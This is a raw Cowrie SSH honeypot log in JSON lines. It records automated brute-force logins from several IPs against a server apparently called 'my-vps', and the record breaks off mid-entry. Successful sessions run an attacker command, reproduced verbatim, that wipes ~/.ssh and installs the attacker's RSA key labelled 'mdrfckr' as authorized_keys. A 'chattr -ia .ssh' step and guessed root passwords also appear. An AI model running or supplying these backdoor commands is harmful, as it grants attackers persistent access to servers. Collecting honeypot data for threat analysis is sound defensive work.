{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:36:09.051695Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:36:09.322339Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:09.323272Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":47155,"dst_ip":"1.2.3.4","dst_port":22,"session":"d82424cf1d05","protocol":"ssh","message":"New connection: 49.247.35.31:47155 (1.2.3.4:22) [session: d82424cf1d05]","sensor":"my-vps","timestamp":"2025-09-08T13:36:09.614085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:36:09.614740Z","src_ip":"49.247.35.31","session":"d82424cf1d05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:36:09.919291Z","src_ip":"49.247.35.31","session":"d82424cf1d05"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:36:11.119822Z","src_ip":"49.247.35.31","session":"d82424cf1d05"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:12.422110Z","src_ip":"49.247.35.31","session":"d82424cf1d05"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":53842,"dst_ip":"1.2.3.4","dst_port":22,"session":"92fb383314d2","protocol":"ssh","message":"New connection: 49.247.35.31:53842 (1.2.3.4:22) [session: 92fb383314d2]","sensor":"my-vps","timestamp":"2025-09-08T13:36:12.704706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:36:12.720407Z","src_ip":"49.247.35.31","session":"92fb383314d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:36:13.014149Z","src_ip":"49.247.35.31","session":"92fb383314d2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:36:14.158929Z","src_ip":"49.247.35.31","session":"92fb383314d2"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:14.458820Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:14.459663Z","src_ip":"49.247.35.31","session":"92fb383314d2"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":53034,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0047d3408e7","protocol":"ssh","message":"New connection: 134.199.174.250:53034 (1.2.3.4:22) [session: e0047d3408e7]","sensor":"my-vps","timestamp":"2025-09-08T13:36:16.986487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:36:17.131075Z","src_ip":"134.199.174.250","session":"e0047d3408e7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:36:17.300718Z","src_ip":"134.199.174.250","session":"e0047d3408e7"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin123","message":"login attempt [ftpuser/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:36:18.542858Z","src_ip":"134.199.174.250","session":"e0047d3408e7"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:19.855834Z","src_ip":"134.199.174.250","session":"e0047d3408e7"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":56516,"dst_ip":"1.2.3.4","dst_port":22,"session":"76e20448d503","protocol":"ssh","message":"New connection: 134.199.174.250:56516 (1.2.3.4:22) [session: 76e20448d503]","sensor":"my-vps","timestamp":"2025-09-08T13:36:49.135277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:36:49.136297Z","src_ip":"134.199.174.250","session":"76e20448d503"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:36:49.435606Z","src_ip":"134.199.174.250","session":"76e20448d503"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234","message":"login attempt [ftpuser/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:36:50.323316Z","src_ip":"134.199.174.250","session":"76e20448d503"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:51.615665Z","src_ip":"134.199.174.250","session":"76e20448d503"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35372,"dst_ip":"1.2.3.4","dst_port":22,"session":"55377a059d1a","protocol":"ssh","message":"New connection: 212.227.235.229:35372 (1.2.3.4:22) [session: 55377a059d1a]","sensor":"my-vps","timestamp":"2025-09-08T13:36:53.143092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:36:53.150779Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:36:53.252525Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe!@#123","message":"login attempt [root/qwe!@#123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:36:53.670434Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:36:53.922772Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:36:53.923494Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:36:53.924687Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:54.048469Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:36:54.274493Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:36:54.275251Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:36:54.378273Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:54.379496Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35386,"dst_ip":"1.2.3.4","dst_port":22,"session":"551e18d872a7","protocol":"ssh","message":"New connection: 212.227.235.229:35386 (1.2.3.4:22) [session: 551e18d872a7]","sensor":"my-vps","timestamp":"2025-09-08T13:36:54.479354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:36:54.480349Z","src_ip":"212.227.235.229","session":"551e18d872a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:36:54.630365Z","src_ip":"212.227.235.229","session":"551e18d872a7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:36:55.075139Z","src_ip":"212.227.235.229","session":"551e18d872a7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:56.179883Z","src_ip":"212.227.235.229","session":"551e18d872a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35388,"dst_ip":"1.2.3.4","dst_port":22,"session":"072c87e78e06","protocol":"ssh","message":"New connection: 212.227.235.229:35388 (1.2.3.4:22) [session: 072c87e78e06]","sensor":"my-vps","timestamp":"2025-09-08T13:36:56.287681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:36:56.288334Z","src_ip":"212.227.235.229","session":"072c87e78e06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:36:56.433570Z","src_ip":"212.227.235.229","session":"072c87e78e06"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:36:56.946476Z","src_ip":"212.227.235.229","session":"072c87e78e06"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:57.048927Z","src_ip":"212.227.235.229","session":"55377a059d1a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:57.052716Z","src_ip":"212.227.235.229","session":"072c87e78e06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36662,"dst_ip":"1.2.3.4","dst_port":22,"session":"103973eae929","protocol":"ssh","message":"New connection: 212.227.235.229:36662 (1.2.3.4:22) [session: 103973eae929]","sensor":"my-vps","timestamp":"2025-09-08T13:37:08.477134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:37:08.477863Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gc